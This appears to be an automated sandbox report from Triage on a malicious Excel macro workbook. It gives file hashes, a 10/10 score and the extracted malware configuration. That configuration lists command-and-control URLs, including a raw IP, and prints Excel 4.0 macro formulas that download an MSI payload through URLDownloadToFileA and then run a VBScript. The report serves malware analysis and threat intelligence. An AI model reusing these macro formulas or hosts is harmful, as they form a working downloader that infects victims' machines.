28e6e4f69385796efba6a29911762b49 | Triage

Submit
Reports

Overview

overview

Static

static

28e6e4f693...9.xlsm

windows7-x64

28e6e4f693...9.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

28e6e4f69385796efba6a29911762b49.xlsm

Resource

win7-20231215-en

windows7-x64

2 signatures

150 seconds

Behavioral task

behavioral2

Sample

28e6e4f69385796efba6a29911762b49.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

8 signatures

150 seconds

General

Target

28e6e4f69385796efba6a29911762b49
Size

6KB
MD5

28e6e4f69385796efba6a29911762b49
SHA1

01337ac41fcc855813f854b3fc0955acf549deb5
SHA256

0defc3d6409a0db9a41ce86ce4a61531c458daebd249f4624d184bb5318cfa47
SHA512

15285427a6b2c610a0f17753aa169ed1160f1a8c0bfa66b04adfabe596bf8a00f4f22468c3ef6920b0fbab43fdf20315dc0ac555dd45755b2c9377007c1ce63a
SSDEEP

192:NDSquSIbrA2OmmfRP8UhHFBFYuhb98yHu+u:NpuJM2wF1FYQb98yHq

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

28e6e4f69385796efba6a29911762b49
.xlsm office2007

© 2018-2025

Terms | Privacy